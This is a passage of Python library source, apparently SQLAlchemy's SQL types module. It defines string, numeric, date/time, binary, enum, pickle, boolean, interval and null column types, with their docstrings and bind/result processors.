interpreted as bytes or characters is database specific.
:param collation: Optional, a column-level collation for
use in DDL and CAST expressions. Renders using the
COLLATE keyword supported by SQLite, MySQL, and Postgresql.
E.g.::
>>> from sqlalchemy import cast, select, String
>>> print select([cast('some string', String(collation='utf8'))])
SELECT CAST(:param_1 AS VARCHAR COLLATE utf8) AS anon_1
.. versionadded:: 0.8 Added support for COLLATE to all
string types.
:param convert_unicode: When set to ``True``, the
:class:`.String` type will assume that
input is to be passed as Python ``unicode`` objects,
and results returned as Python ``unicode`` objects.
If the DBAPI in use does not support Python unicode
(which is fewer and fewer these days), SQLAlchemy
will encode/decode the value, using the
value of the ``encoding`` parameter passed to
:func:`.create_engine` as the encoding.
When using a DBAPI that natively supports Python
unicode objects, this flag generally does not
need to be set. For columns that are explicitly
intended to store non-ASCII data, the :class:`.Unicode`
or :class:`UnicodeText`
types should be used regardless, which feature
the same behavior of ``convert_unicode`` but
also indicate an underlying column type that
directly supports unicode, such as ``NVARCHAR``.
For the extremely rare case that Python ``unicode``
is to be encoded/decoded by SQLAlchemy on a backend
that does natively support Python ``unicode``,
the value ``force`` can be passed here which will
cause SQLAlchemy's encode/decode services to be
used unconditionally.
:param unicode_error: Optional, a method to use to handle Unicode
conversion errors. Behaves like the ``errors`` keyword argument to
the standard library's ``string.decode()`` functions. This flag
requires that ``convert_unicode`` is set to ``force`` - otherwise,
SQLAlchemy is not guaranteed to handle the task of unicode
conversion. Note that this flag adds significant performance
overhead to row-fetching operations for backends that already
return unicode objects natively (which most DBAPIs do). This
flag should only be used as a last resort for reading
strings from a column with varied or corrupted encodings.
"""
if unicode_error is not None and convert_unicode != 'force':
raise exc.ArgumentError("convert_unicode must be 'force' "
"when unicode_error is set.")
self.length = length
self.collation = collation
self.convert_unicode = convert_unicode
self.unicode_error = unicode_error
self._warn_on_bytestring = _warn_on_bytestring
def bind_processor(self, dialect):
if self.convert_unicode or dialect.convert_unicode:
if dialect.supports_unicode_binds and \
self.convert_unicode != 'force':
if self._warn_on_bytestring:
def process(value):
if isinstance(value, util.binary_type):
util.warn("Unicode type received non-unicode bind "
"param value.")
return value
return process
else:
return None
else:
encoder = codecs.getencoder(dialect.encoding)
warn_on_bytestring = self._warn_on_bytestring
def process(value):
if isinstance(value, util.text_type):
return encoder(value, self.unicode_error)[0]
elif warn_on_bytestring and value is not None:
util.warn("Unicode type received non-unicode bind "
"param value")
return value
return process
else:
return None
def result_processor(self, dialect, coltype):
wants_unicode = self.convert_unicode or dialect.convert_unicode
needs_convert = wants_unicode and \
(dialect.returns_unicode_strings is not True or
self.convert_unicode == 'force')
if needs_convert:
to_unicode = processors.to_unicode_processor_factory(
dialect.encoding, self.unicode_error)
if dialect.returns_unicode_strings:
# we wouldn't be here unless convert_unicode='force'
# was specified, or the driver has erratic unicode-returning
# habits. since we will be getting back unicode
# in most cases, we check for it (decode will fail).
def process(value):
if isinstance(value, util.text_type):
return value
else:
return to_unicode(value)
return process
else:
# here, we assume that the object is not unicode,
# avoiding expensive isinstance() check.
return to_unicode
else:
return None
@property
def python_type(self):
if self.convert_unicode:
return util.text_type
else:
return str
def get_dbapi_type(self, dbapi):
return dbapi.STRING
class Text(String):
"""A variably sized string type.
In SQL, usually corresponds to CLOB or TEXT. Can also take Python
unicode objects and encode to the database's encoding in bind
params (and the reverse for result sets.) In general, TEXT objects
do not have a length; while some databases will accept a length
argument here, it will be rejected by others.
"""
__visit_name__ = 'text'
class Unicode(String):
"""A variable length Unicode string type.
The :class:`.Unicode` type is a :class:`.String` subclass
that assumes input and output as Python ``unicode`` data,
and in that regard is equivalent to the usage of the
``convert_unicode`` flag with the :class:`.String` type.
However, unlike plain :class:`.String`, it also implies an
underlying column type that is explicitly supporting of non-ASCII
data, such as ``NVARCHAR`` on Oracle and SQL Server.
This can impact the output of ``CREATE TABLE`` statements
and ``CAST`` functions at the dialect level, and can
also affect the handling of bound parameters in some
specific DBAPI scenarios.
The encoding used by the :class:`.Unicode` type is usually
determined by the DBAPI itself; most modern DBAPIs
feature support for Python ``unicode`` objects as bound
values and result set values, and the encoding should
be configured as detailed in the notes for the target
DBAPI in the :ref:`dialect_toplevel` section.
For those DBAPIs which do not support, or are not configured
to accommodate Python ``unicode`` objects
directly, SQLAlchemy does the encoding and decoding
outside of the DBAPI. The encoding in this scenario
is determined by the ``encoding`` flag passed to
:func:`.create_engine`.
When using the :class:`.Unicode` type, it is only appropriate
to pass Python ``unicode`` objects, and not plain ``str``.
If a plain ``str`` is passed under Python 2, a warning
is emitted. If you notice your application emitting these warnings but
you're not sure of the source of them, the Python
``warnings`` filter, documented at
http://docs.python.org/library/warnings.html,
can be used to turn these warnings into exceptions
which will illustrate a stack trace::
import warnings
warnings.simplefilter('error')
For an application that wishes to pass plain bytestrings
and Python ``unicode`` objects to the ``Unicode`` type
equally, the bytestrings must first be decoded into
unicode. The recipe at :ref:`coerce_to_unicode` illustrates
how this is done.
See also:
:class:`.UnicodeText` - unlengthed textual counterpart
to :class:`.Unicode`.
"""
__visit_name__ = 'unicode'
def __init__(self, length=None, **kwargs):
"""
Create a :class:`.Unicode` object.
Parameters are the same as that of :class:`.String`,
with the exception that ``convert_unicode``
defaults to ``True``.
"""
kwargs.setdefault('convert_unicode', True)
kwargs.setdefault('_warn_on_bytestring', True)
super(Unicode, self).__init__(length=length, **kwargs)
class UnicodeText(Text):
"""An unbounded-length Unicode string type.
See :class:`.Unicode` for details on the unicode
behavior of this object.
    Like :class:`.Unicode`, usage of the :class:`.UnicodeText` type implies a
unicode-capable type being used on the backend, such as
``NCLOB``, ``NTEXT``.
"""
__visit_name__ = 'unicode_text'
def __init__(self, length=None, **kwargs):
"""
Create a Unicode-converting Text type.
Parameters are the same as that of :class:`.Text`,
with the exception that ``convert_unicode``
defaults to ``True``.
"""
kwargs.setdefault('convert_unicode', True)
kwargs.setdefault('_warn_on_bytestring', True)
super(UnicodeText, self).__init__(length=length, **kwargs)
class Integer(_DateAffinity, TypeEngine):
"""A type for ``int`` integers."""
__visit_name__ = 'integer'
def get_dbapi_type(self, dbapi):
return dbapi.NUMBER
@property
def python_type(self):
return int
@util.memoized_property
def _expression_adaptations(self):
# TODO: need a dictionary object that will
# handle operators generically here, this is incomplete
return {
operators.add: {
Date: Date,
Integer: self.__class__,
Numeric: Numeric,
},
operators.mul: {
Interval: Interval,
Integer: self.__class__,
Numeric: Numeric,
},
operators.div: {
Integer: self.__class__,
Numeric: Numeric,
},
operators.truediv: {
Integer: self.__class__,
Numeric: Numeric,
},
operators.sub: {
Integer: self.__class__,
Numeric: Numeric,
},
}
class SmallInteger(Integer):
"""A type for smaller ``int`` integers.
Typically generates a ``SMALLINT`` in DDL, and otherwise acts like
a normal :class:`.Integer` on the Python side.
"""
__visit_name__ = 'small_integer'
class BigInteger(Integer):
"""A type for bigger ``int`` integers.
Typically generates a ``BIGINT`` in DDL, and otherwise acts like
a normal :class:`.Integer` on the Python side.
"""
__visit_name__ = 'big_integer'
class Numeric(_DateAffinity, TypeEngine):
"""A type for fixed precision numbers.
Typically generates DECIMAL or NUMERIC. Returns
``decimal.Decimal`` objects by default, applying
conversion as needed.
.. note::
The `cdecimal <http://pypi.python.org/pypi/cdecimal/>`_ library
is a high performing alternative to Python's built-in
``decimal.Decimal`` type, which performs very poorly in high volume
situations. SQLAlchemy 0.7 is tested against ``cdecimal`` and supports
it fully. The type is not necessarily supported by DBAPI
implementations however, most of which contain an import for plain
``decimal`` in their source code, even though some such as psycopg2
provide hooks for alternate adapters. SQLAlchemy imports ``decimal``
globally as well. The most straightforward and
foolproof way to use "cdecimal" given current DBAPI and Python support
is to patch it directly into sys.modules before anything else is
imported::
import sys
import cdecimal
sys.modules["decimal"] = cdecimal
While the global patch is a little ugly, it's particularly
important to use just one decimal library at a time since
Python Decimal and cdecimal Decimal objects
are not currently compatible *with each other*::
>>> import cdecimal
>>> import decimal
>>> decimal.Decimal("10") == cdecimal.Decimal("10")
False
SQLAlchemy will provide more natural support of
cdecimal if and when it becomes a standard part of Python
installations and is supported by all DBAPIs.
"""
__visit_name__ = 'numeric'
def __init__(self, precision=None, scale=None, asdecimal=True):
"""
Construct a Numeric.
:param precision: the numeric precision for use in DDL ``CREATE
TABLE``.
:param scale: the numeric scale for use in DDL ``CREATE TABLE``.
:param asdecimal: default True. Return whether or not
values should be sent as Python Decimal objects, or
as floats. Different DBAPIs send one or the other based on
datatypes - the Numeric type will ensure that return values
are one or the other across DBAPIs consistently.
When using the ``Numeric`` type, care should be taken to ensure
        that the asdecimal setting is appropriate for the DBAPI in use -
when Numeric applies a conversion from Decimal->float or float->
Decimal, this conversion incurs an additional performance overhead
for all result columns received.
DBAPIs that return Decimal natively (e.g. psycopg2) will have
better accuracy and higher performance with a setting of ``True``,
as the native translation to Decimal reduces the amount of floating-
point issues at play, and the Numeric type itself doesn't need
to apply any further conversions. However, another DBAPI which
returns floats natively *will* incur an additional conversion
overhead, and is still subject to floating point data loss - in
which case ``asdecimal=False`` will at least remove the extra
conversion overhead.
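        As an illustrative sketch only (the column name is hypothetical), a
        column intended to return plain ``float`` values on every backend
        could be declared as::

            Column('score', Numeric(precision=10, scale=2, asdecimal=False))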
"""
self.precision = precision
self.scale = scale
self.asdecimal = asdecimal
def get_dbapi_type(self, dbapi):
return dbapi.NUMBER
@property
def python_type(self):
if self.asdecimal:
return decimal.Decimal
else:
return float
def bind_processor(self, dialect):
if dialect.supports_native_decimal:
return None
else:
return processors.to_float
def result_processor(self, dialect, coltype):
if self.asdecimal:
if dialect.supports_native_decimal:
# we're a "numeric", DBAPI will give us Decimal directly
return None
else:
util.warn('Dialect %s+%s does *not* support Decimal '
'objects natively, and SQLAlchemy must '
'convert from floating point - rounding '
'errors and other issues may occur. Please '
'consider storing Decimal numbers as strings '
'or integers on this platform for lossless '
'storage.' % (dialect.name, dialect.driver))
# we're a "numeric", DBAPI returns floats, convert.
if self.scale is not None:
return processors.to_decimal_processor_factory(
decimal.Decimal, self.scale)
else:
return processors.to_decimal_processor_factory(
decimal.Decimal)
else:
if dialect.supports_native_decimal:
return processors.to_float
else:
return None
@util.memoized_property
def _expression_adaptations(self):
return {
operators.mul: {
Interval: Interval,
Numeric: self.__class__,
Integer: self.__class__,
},
operators.div: {
Numeric: self.__class__,
Integer: self.__class__,
},
operators.truediv: {
Numeric: self.__class__,
Integer: self.__class__,
},
operators.add: {
Numeric: self.__class__,
Integer: self.__class__,
},
operators.sub: {
Numeric: self.__class__,
Integer: self.__class__,
}
}
class Float(Numeric):
"""A type for ``float`` numbers.
Returns Python ``float`` objects by default, applying
conversion as needed.
"""
__visit_name__ = 'float'
scale = None
def __init__(self, precision=None, asdecimal=False, **kwargs):
"""
Construct a Float.
:param precision: the numeric precision for use in DDL ``CREATE
TABLE``.
:param asdecimal: the same flag as that of :class:`.Numeric`, but
defaults to ``False``. Note that setting this flag to ``True``
results in floating point conversion.
:param \**kwargs: deprecated. Additional arguments here are ignored
by the default :class:`.Float` type. For database specific
floats that support additional arguments, see that dialect's
documentation for details, such as
:class:`sqlalchemy.dialects.mysql.FLOAT`.
"""
self.precision = precision
self.asdecimal = asdecimal
if kwargs:
util.warn_deprecated("Additional keyword arguments "
"passed to Float ignored.")
def result_processor(self, dialect, coltype):
if self.asdecimal:
return processors.to_decimal_processor_factory(decimal.Decimal)
else:
return None
@util.memoized_property
def _expression_adaptations(self):
return {
operators.mul: {
Interval: Interval,
Numeric: self.__class__,
},
operators.div: {
Numeric: self.__class__,
},
operators.truediv: {
Numeric: self.__class__,
},
operators.add: {
Numeric: self.__class__,
},
operators.sub: {
Numeric: self.__class__,
}
}
class DateTime(_DateAffinity, TypeEngine):
"""A type for ``datetime.datetime()`` objects.
Date and time types return objects from the Python ``datetime``
module. Most DBAPIs have built in support for the datetime
module, with the noted exception of SQLite. In the case of
SQLite, date and time types are stored as strings which are then
converted back to datetime objects when rows are returned.
"""
__visit_name__ = 'datetime'
def __init__(self, timezone=False):
"""Construct a new :class:`.DateTime`.
:param timezone: boolean. If True, and supported by the
backend, will produce 'TIMESTAMP WITH TIMEZONE'. For backends
that don't support timezone aware timestamps, has no
effect.
"""
self.timezone = timezone
def get_dbapi_type(self, dbapi):
return dbapi.DATETIME
@property
def python_type(self):
return dt.datetime
@util.memoized_property
def _expression_adaptations(self):
return {
operators.add: {
Interval: self.__class__,
},
operators.sub: {
Interval: self.__class__,
DateTime: Interval,
},
}
class Date(_DateAffinity, TypeEngine):
"""A type for ``datetime.date()`` objects."""
__visit_name__ = 'date'
def get_dbapi_type(self, dbapi):
return dbapi.DATETIME
@property
def python_type(self):
return dt.date
@util.memoized_property
def _expression_adaptations(self):
return {
operators.add: {
Integer: self.__class__,
Interval: DateTime,
Time: DateTime,
},
operators.sub: {
# date - integer = date
Integer: self.__class__,
# date - date = integer.
Date: Integer,
Interval: DateTime,
# date - datetime = interval,
# this one is not in the PG docs
# but works
DateTime: Interval,
},
}
class Time(_DateAffinity, TypeEngine):
"""A type for ``datetime.time()`` objects."""
__visit_name__ = 'time'
def __init__(self, timezone=False):
self.timezone = timezone
def get_dbapi_type(self, dbapi):
return dbapi.DATETIME
@property
def python_type(self):
return dt.time
@util.memoized_property
def _expression_adaptations(self):
return {
operators.add: {
Date: DateTime,
Interval: self.__class__
},
operators.sub: {
Time: Interval,
Interval: self.__class__,
},
}
class _Binary(TypeEngine):
"""Define base behavior for binary types."""
def __init__(self, length=None):
self.length = length
@property
def python_type(self):
return util.binary_type
# Python 3 - sqlite3 doesn't need the `Binary` conversion
# here, though pg8000 does to indicate "bytea"
def bind_processor(self, dialect):
DBAPIBinary = dialect.dbapi.Binary
def process(value):
if value is not None:
return DBAPIBinary(value)
else:
return None
return process
# Python 3 has native bytes() type
# both sqlite3 and pg8000 seem to return it,
# psycopg2 as of 2.5 returns 'memoryview'
if util.py2k:
def result_processor(self, dialect, coltype):
if util.jython:
def process(value):
if value is not None:
if isinstance(value, array.array):
return value.tostring()
return str(value)
else:
return None
else:
process = processors.to_str
return process
else:
def result_processor(self, dialect, coltype):
def process(value):
if value is not None:
value = bytes(value)
return value
return process
def coerce_compared_value(self, op, value):
"""See :meth:`.TypeEngine.coerce_compared_value` for a description."""
if isinstance(value, util.string_types):
return self
else:
return super(_Binary, self).coerce_compared_value(op, value)
def get_dbapi_type(self, dbapi):
return dbapi.BINARY
class LargeBinary(_Binary):
"""A type for large binary byte data.
The Binary type generates BLOB or BYTEA when tables are created,
and also converts incoming values using the ``Binary`` callable
provided by each DB-API.
"""
__visit_name__ = 'large_binary'
def __init__(self, length=None):
"""
Construct a LargeBinary type.
:param length: optional, a length for the column for use in
DDL statements, for those BLOB types that accept a length
(i.e. MySQL). It does *not* produce a small BINARY/VARBINARY
type - use the BINARY/VARBINARY types specifically for those.
May be safely omitted if no ``CREATE
TABLE`` will be issued. Certain databases may require a
*length* for use in DDL, and will raise an exception when
the ``CREATE TABLE`` DDL is issued.
"""
_Binary.__init__(self, length=length)
class Binary(LargeBinary):
"""Deprecated. Renamed to LargeBinary."""
def __init__(self, *arg, **kw):
util.warn_deprecated('The Binary type has been renamed to '
'LargeBinary.')
LargeBinary.__init__(self, *arg, **kw)
class SchemaType(SchemaEventTarget):
"""Mark a type as possibly requiring schema-level DDL for usage.
Supports types that must be explicitly created/dropped (i.e. PG ENUM type)
as well as types that are complimented by table or schema level
constraints, triggers, and other rules.
:class:`.SchemaType` classes can also be targets for the
:meth:`.DDLEvents.before_parent_attach` and
:meth:`.DDLEvents.after_parent_attach` events, where the events fire off
surrounding the association of the type object with a parent
:class:`.Column`.
.. seealso::
:class:`.Enum`
:class:`.Boolean`
"""
def __init__(self, **kw):
name = kw.pop('name', None)
if name is not None:
self.name = quoted_name(name, kw.pop('quote', None))
else:
self.name = None
self.schema = kw.pop('schema', None)
self.metadata = kw.pop('metadata', None)
self.inherit_schema = kw.pop('inherit_schema', False)
if self.metadata:
event.listen(
self.metadata,
"before_create",
util.portable_instancemethod(self._on_metadata_create)
)
event.listen(
self.metadata,
"after_drop",
util.portable_instancemethod(self._on_metadata_drop)
)
def _set_parent(self, column):
column._on_table_attach(util.portable_instancemethod(self._set_table))
def _set_table(self, column, table):
if self.inherit_schema:
self.schema = table.schema
event.listen(
table,
"before_create",
util.portable_instancemethod(
self._on_table_create)
)
event.listen(
table,
"after_drop",
util.portable_instancemethod(self._on_table_drop)
)
if self.metadata is None:
# TODO: what's the difference between self.metadata
# and table.metadata here ?
event.listen(
table.metadata,
"before_create",
util.portable_instancemethod(self._on_metadata_create)
)
event.listen(
table.metadata,
"after_drop",
util.portable_instancemethod(self._on_metadata_drop)
)
def copy(self, **kw):
return self.adapt(self.__class__)
def adapt(self, impltype, **kw):
schema = kw.pop('schema', self.schema)
metadata = kw.pop('metadata', self.metadata)
return impltype(name=self.name,
schema=schema,
metadata=metadata,
inherit_schema=self.inherit_schema,
**kw
)
@property
def bind(self):
return self.metadata and self.metadata.bind or None
def create(self, bind=None, checkfirst=False):
"""Issue CREATE ddl for this type, if applicable."""
if bind is None:
bind = _bind_or_error(self)
t = self.dialect_impl(bind.dialect)
if t.__class__ is not self.__class__ and isinstance(t, SchemaType):
t.create(bind=bind, checkfirst=checkfirst)
def drop(self, bind=None, checkfirst=False):
"""Issue DROP ddl for this type, if applicable."""
if bind is None:
bind = _bind_or_error(self)
t = self.dialect_impl(bind.dialect)
if t.__class__ is not self.__class__ and isinstance(t, SchemaType):
t.drop(bind=bind, checkfirst=checkfirst)
def _on_table_create(self, target, bind, **kw):
t = self.dialect_impl(bind.dialect)
if t.__class__ is not self.__class__ and isinstance(t, SchemaType):
t._on_table_create(target, bind, **kw)
def _on_table_drop(self, target, bind, **kw):
t = self.dialect_impl(bind.dialect)
if t.__class__ is not self.__class__ and isinstance(t, SchemaType):
t._on_table_drop(target, bind, **kw)
def _on_metadata_create(self, target, bind, **kw):
t = self.dialect_impl(bind.dialect)
if t.__class__ is not self.__class__ and isinstance(t, SchemaType):
t._on_metadata_create(target, bind, **kw)
def _on_metadata_drop(self, target, bind, **kw):
t = self.dialect_impl(bind.dialect)
if t.__class__ is not self.__class__ and isinstance(t, SchemaType):
t._on_metadata_drop(target, bind, **kw)
class Enum(String, SchemaType):
"""Generic Enum Type.
The Enum type provides a set of possible string values which the
column is constrained towards.
By default, uses the backend's native ENUM type if available,
else uses VARCHAR + a CHECK constraint.
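    A minimal usage sketch follows; the table and column names are
    illustrative only and not part of this module::

        from sqlalchemy import Table, Column, Integer, Enum, MetaData

        tickets = Table('ticket', MetaData(),
            Column('id', Integer, primary_key=True),
            Column('status', Enum('open', 'closed', name='ticket_status'))
        )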
.. seealso::
:class:`~.postgresql.ENUM` - PostgreSQL-specific type,
which has additional functionality.
"""
__visit_name__ = 'enum'
def __init__(self, *enums, **kw):
"""Construct an enum.
Keyword arguments which don't apply to a specific backend are ignored
by that backend.
:param \*enums: string or unicode enumeration labels. If unicode
labels are present, the `convert_unicode` flag is auto-enabled.
:param convert_unicode: Enable unicode-aware bind parameter and
result-set processing for this Enum's data. This is set
automatically based on the presence of unicode label strings.
:param metadata: Associate this type directly with a ``MetaData``
object. For types that exist on the target database as an
independent schema construct (Postgresql), this type will be
created and dropped within ``create_all()`` and ``drop_all()``
operations. If the type is not associated with any ``MetaData``
object, it will associate itself with each ``Table`` in which it is
used, and will be created when any of those individual tables are
          created, after a check is performed for its existence. The type is
only dropped when ``drop_all()`` is called for that ``Table``
object's metadata, however.
:param name: The name of this type. This is required for Postgresql
and any future supported database which requires an explicitly
named type, or an explicitly named constraint in order to generate
the type and/or a table that uses it.
:param native_enum: Use the database's native ENUM type when
available. Defaults to True. When False, uses VARCHAR + check
constraint for all backends.
:param schema: Schema name of this type. For types that exist on the
target database as an independent schema construct (Postgresql),
this parameter specifies the named schema in which the type is
present.
.. note::
The ``schema`` of the :class:`.Enum` type does not
by default make use of the ``schema`` established on the
owning :class:`.Table`. If this behavior is desired,
set the ``inherit_schema`` flag to ``True``.
:param quote: Set explicit quoting preferences for the type's name.
:param inherit_schema: When ``True``, the "schema" from the owning
:class:`.Table` will be copied to the "schema" attribute of this
:class:`.Enum`, replacing whatever value was passed for the
``schema`` attribute. This also takes effect when using the
:meth:`.Table.tometadata` operation.
.. versionadded:: 0.8
"""
self.enums = enums
self.native_enum = kw.pop('native_enum', True)
convert_unicode = kw.pop('convert_unicode', None)
if convert_unicode is None:
for e in enums:
if isinstance(e, util.text_type):
convert_unicode = True
break
else:
convert_unicode = False
if self.enums:
length = max(len(x) for x in self.enums)
else:
length = 0
String.__init__(self,
length=length,
convert_unicode=convert_unicode,
)
SchemaType.__init__(self, **kw)
def __repr__(self):
return util.generic_repr(self, [
("native_enum", True),
("name", None)
])
def _should_create_constraint(self, compiler):
return not self.native_enum or \
not compiler.dialect.supports_native_enum
@util.dependencies("sqlalchemy.sql.schema")
def _set_table(self, schema, column, table):
if self.native_enum:
SchemaType._set_table(self, column, table)
e = schema.CheckConstraint(
column.in_(self.enums),
name=self.name,
_create_rule=util.portable_instancemethod(
self._should_create_constraint)
)
table.append_constraint(e)
def adapt(self, impltype, **kw):
schema = kw.pop('schema', self.schema)
metadata = kw.pop('metadata', self.metadata)
if issubclass(impltype, Enum):
return impltype(name=self.name,
schema=schema,
metadata=metadata,
convert_unicode=self.convert_unicode,
native_enum=self.native_enum,
inherit_schema=self.inherit_schema,
*self.enums,
**kw
)
else:
return super(Enum, self).adapt(impltype, **kw)
class PickleType(TypeDecorator):
"""Holds Python objects, which are serialized using pickle.
PickleType builds upon the Binary type to apply Python's
``pickle.dumps()`` to incoming objects, and ``pickle.loads()`` on
the way out, allowing any pickleable Python object to be stored as
a serialized binary field.
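    For example (the column name below is illustrative only), any
    pickleable value may be assigned to a column declared as::

        Column('payload', PickleType())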
To allow ORM change events to propagate for elements associated
with :class:`.PickleType`, see :ref:`mutable_toplevel`.
"""
impl = LargeBinary
def __init__(self, protocol=pickle.HIGHEST_PROTOCOL,
pickler=None, comparator=None):
"""
Construct a PickleType.
:param protocol: defaults to ``pickle.HIGHEST_PROTOCOL``.
:param pickler: defaults to cPickle.pickle or pickle.pickle if
cPickle is not available. May be any object with
          pickle-compatible ``dumps`` and ``loads`` methods.
:param comparator: a 2-arg callable predicate used
to compare values of this type. If left as ``None``,
the Python "equals" operator is used to compare values.
"""
self.protocol = protocol
self.pickler = pickler or pickle
self.comparator = comparator
super(PickleType, self).__init__()
def __reduce__(self):
return PickleType, (self.protocol,
None,
self.comparator)
def bind_processor(self, dialect):
impl_processor = self.impl.bind_processor(dialect)
dumps = self.pickler.dumps
protocol = self.protocol
if impl_processor:
def process(value):
if value is not None:
value = dumps(value, protocol)
return impl_processor(value)
else:
def process(value):
if value is not None:
value = dumps(value, protocol)
return value
return process
def result_processor(self, dialect, coltype):
impl_processor = self.impl.result_processor(dialect, coltype)
loads = self.pickler.loads
if impl_processor:
def process(value):
value = impl_processor(value)
if value is None:
return None
return loads(value)
else:
def process(value):
if value is None:
return None
return loads(value)
return process
def compare_values(self, x, y):
if self.comparator:
return self.comparator(x, y)
else:
return x == y
class Boolean(TypeEngine, SchemaType):
"""A bool datatype.
Boolean typically uses BOOLEAN or SMALLINT on the DDL side, and on
the Python side deals in ``True`` or ``False``.
"""
__visit_name__ = 'boolean'
def __init__(self, create_constraint=True, name=None):
"""Construct a Boolean.
:param create_constraint: defaults to True. If the boolean
is generated as an int/smallint, also create a CHECK constraint
on the table that ensures 1 or 0 as a value.
:param name: if a CHECK constraint is generated, specify
the name of the constraint.
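        A hypothetical column using an explicitly named constraint could be
        declared as::

            Column('is_active', Boolean(create_constraint=True, name='ck_is_active'))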
"""
self.create_constraint = create_constraint
self.name = name
def _should_create_constraint(self, compiler):
return not compiler.dialect.supports_native_boolean
@util.dependencies("sqlalchemy.sql.schema")
def _set_table(self, schema, column, table):
if not self.create_constraint:
return
e = schema.CheckConstraint(
column.in_([0, 1]),
name=self.name,
_create_rule=util.portable_instancemethod(
self._should_create_constraint)
)
table.append_constraint(e)
@property
def python_type(self):
return bool
def bind_processor(self, dialect):
if dialect.supports_native_boolean:
return None
else:
return processors.boolean_to_int
def result_processor(self, dialect, coltype):
if dialect.supports_native_boolean:
return None
else:
return processors.int_to_boolean
class Interval(_DateAffinity, TypeDecorator):
"""A type for ``datetime.timedelta()`` objects.
The Interval type deals with ``datetime.timedelta`` objects. In
PostgreSQL, the native ``INTERVAL`` type is used; for others, the
value is stored as a date which is relative to the "epoch"
(Jan. 1, 1970).
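    For backends without a native interval type, the epoch-based storage
    amounts to roughly the following sketch (values illustrative only)::

        import datetime as dt

        epoch = dt.datetime.utcfromtimestamp(0)
        stored = epoch + dt.timedelta(days=2)   # persisted as a DATETIME
        value = stored - epoch                  # timedelta(days=2) on the way out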
Note that the ``Interval`` type does not currently provide date arithmetic
operations on platforms which do not support interval types natively. Such
operations usually require transformation of both sides of the expression
(such as, conversion of both sides into integer epoch values first) which
currently is a manual procedure (such as via
:attr:`~sqlalchemy.sql.expression.func`).
"""
impl = DateTime
epoch = dt.datetime.utcfromtimestamp(0)
def __init__(self, native=True,
second_precision=None,
day_precision=None):
"""Construct an Interval object.
:param native: when True, use the actual
INTERVAL type provided by the database, if
supported (currently Postgresql, Oracle).
Otherwise, represent the interval data as
an epoch value regardless.
:param second_precision: For native interval types
which support a "fractional seconds precision" parameter,
i.e. Oracle and Postgresql
:param day_precision: for native interval types which
support a "day precision" parameter, i.e. Oracle.
"""
super(Interval, self).__init__()
self.native = native
self.second_precision = second_precision
self.day_precision = day_precision
def adapt(self, cls, **kw):
if self.native and hasattr(cls, '_adapt_from_generic_interval'):
return cls._adapt_from_generic_interval(self, **kw)
else:
return self.__class__(
native=self.native,
second_precision=self.second_precision,
day_precision=self.day_precision,
**kw)
@property
def python_type(self):
return dt.timedelta
def bind_processor(self, dialect):
impl_processor = self.impl.bind_processor(dialect)
epoch = self.epoch
if impl_processor:
def process(value):
if value is not None:
value = epoch + value
return impl_processor(value)
else:
def process(value):
if value is not None:
value = epoch + value
return value
return process
def result_processor(self, dialect, coltype):
impl_processor = self.impl.result_processor(dialect, coltype)
epoch = self.epoch
if impl_processor:
def process(value):
value = impl_processor(value)
if value is None:
return None
return value - epoch
else:
def process(value):
if value is None:
return None
return value - epoch
return process
@util.memoized_property
def _expression_adaptations(self):
return {
operators.add: {
Date: DateTime,
Interval: self.__class__,
DateTime: DateTime,
Time: Time,
},
operators.sub: {
Interval: self.__class__
},
operators.mul: {
Numeric: self.__class__
},
operators.truediv: {
Numeric: self.__class__
},
operators.div: {
Numeric: self.__class__
}
}
@property
def _type_affinity(self):
return Interval
def coerce_compared_value(self, op, value):
"""See :meth:`.TypeEngine.coerce_compared_value` for a description."""
return self.impl.coerce_compared_value(op, value)
class REAL(Float):
"""The SQL REAL type."""
__visit_name__ = 'REAL'
class FLOAT(Float):
"""The SQL FLOAT type."""
__visit_name__ = 'FLOAT'
class NUMERIC(Numeric):
"""The SQL NUMERIC type."""
__visit_name__ = 'NUMERIC'
class DECIMAL(Numeric):
"""The SQL DECIMAL type."""
__visit_name__ = 'DECIMAL'
class INTEGER(Integer):
"""The SQL INT or INTEGER type."""
__visit_name__ = 'INTEGER'
INT = INTEGER
class SMALLINT(SmallInteger):
"""The SQL SMALLINT type."""
__visit_name__ = 'SMALLINT'
class BIGINT(BigInteger):
"""The SQL BIGINT type."""
__visit_name__ = 'BIGINT'
class TIMESTAMP(DateTime):
"""The SQL TIMESTAMP type."""
__visit_name__ = 'TIMESTAMP'
def get_dbapi_type(self, dbapi):
return dbapi.TIMESTAMP
class DATETIME(DateTime):
"""The SQL DATETIME type."""
__visit_name__ = 'DATETIME'
class DATE(Date):
"""The SQL DATE type."""
__visit_name__ = 'DATE'
class TIME(Time):
"""The SQL TIME type."""
__visit_name__ = 'TIME'
class TEXT(Text):
"""The SQL TEXT type."""
__visit_name__ = 'TEXT'
class CLOB(Text):
"""The CLOB type.
This type is found in Oracle and Informix.
"""
__visit_name__ = 'CLOB'
class VARCHAR(String):
"""The SQL VARCHAR type."""
__visit_name__ = 'VARCHAR'
class NVARCHAR(Unicode):
"""The SQL NVARCHAR type."""
__visit_name__ = 'NVARCHAR'
class CHAR(String):
"""The SQL CHAR type."""
__visit_name__ = 'CHAR'
class NCHAR(Unicode):
"""The SQL NCHAR type."""
__visit_name__ = 'NCHAR'
class BLOB(LargeBinary):
"""The SQL BLOB type."""
__visit_name__ = 'BLOB'
class BINARY(_Binary):
"""The SQL BINARY type."""
__visit_name__ = 'BINARY'
class VARBINARY(_Binary):
"""The SQL VARBINARY type."""
__visit_name__ = 'VARBINARY'
class BOOLEAN(Boolean):
"""The SQL BOOLEAN type."""
__visit_name__ = 'BOOLEAN'
class NullType(TypeEngine):
"""An unknown type.
:class:`.NullType` is used as a default type for those cases where
a type cannot be determined, including:
* During table reflection, when the type of a column is not recognized
by the :class:`.Dialect`
* When constructing SQL expressions using plain Python objects of
unknown types (e.g. ``somecolumn == my_special_object``)
* When a new :class:`.Column` is created, and the given type is passed
as ``None`` or is not passed at all.
The :class:`.NullType` can be used within SQL expression invocation
    without issue; it just has no behavior either at the expression construction
    level or at the bind-parameter/result processing level. :class:`.NullType`
    will result in a :class:`.CompileError` if the compiler is asked to render
the type itself, such as if it is used in a :func:`.cast` operation
or within a schema creation operation such as that invoked by
:meth:`.MetaData.create_all` or the :class:`.CreateTable` construct.
"""
__visit_name__ = 'null'
_isnull = True
class Comparator(TypeEngine.Comparator):
def _adapt_expression(self, op, other_comparator):
if isinstance(other_comparator, NullType.Comparator) or \
not operators.is_commutative(op):
return op, self.expr.type
else:
return other_comparator._adapt_expression(op, self)
comparator_factory = Comparator
NULLTYPE = NullType()
